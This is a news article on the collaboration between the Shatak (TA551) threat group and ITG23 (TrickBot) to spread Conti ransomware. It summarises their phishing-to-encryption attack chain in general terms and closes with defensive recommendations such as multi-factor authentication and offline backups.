Shatak (TA551), a threat actor, recently teamed up with the ITG23 gang (also known as Wizard Spider and TrickBot) to distribute Conti ransomware to targeted computers.
The Shatak organization collaborates with other malware creators to build phishing campaigns that download malware and infect victims.
Researchers from IBM X-Force revealed that Shatak and TrickBot started collaborating in July 2021, with good success, as the campaigns have persisted to this day.
Cybereason’s new technical investigation delves deeper into how the two separate hackers collaborated to launch ransomware operations.
A typical infection chain begins with Shatak sending a phishing email with a password-protected zip containing a malicious document.
Shatak frequently leverages reply-chain emails taken from prior victims and adds password-protected archive files, according to an IBM X-Force investigation from October.
These files contain scripts that download and install the BazarBackdoor or TrickBot malware from a remote site using base-64 encoded code.
Most sites of the current campaign’s distribution are in European nations, including Germany, Slovakia, and the Netherlands.
ITG23 takes control of the compromised machine after efficiently deploying TrickBot or/and BazarBackdoor, by deploying a Cobalt Strike beacon and adding it to the scheduled activities for persistence.
The Conti actors then employ the BazarBackdoor dropped to do network reconnaissance, including identifying users, domain administrators, shared machines, and shared resources.
Then they steal user credentials, password hashes, and Active Directory information and use everything they can to expand laterally via the network.
Fiddling with registry entries that permit RDP access and altering Windows Firewall rules with the ‘netsh’ tool are two examples of this behavior.
The real-time monitoring feature of Windows Defender has also been deactivated to prevent alarms or interventions during the encryption process.
Conti uses the ‘Rclone’ program to transport everything to a remote endpoint under their control for data exfiltration, which is the last step before encrypting a file.
Threat actors use ransomware to encrypt devices after extracting all critical data from the network.
Employee training on the dangers of phishing emails is the strongest defense against these sorts of cyberattacks.
Aside from that, administrators should impose multi-factor authentication on users, terminate unneeded RDP services, and check the appropriate event logs for unexpected configuration changes regularly.
Finally, a crucial safety step is periodically storing vital data to a secure remote place and then putting those backups offline so threat actors can’t target them.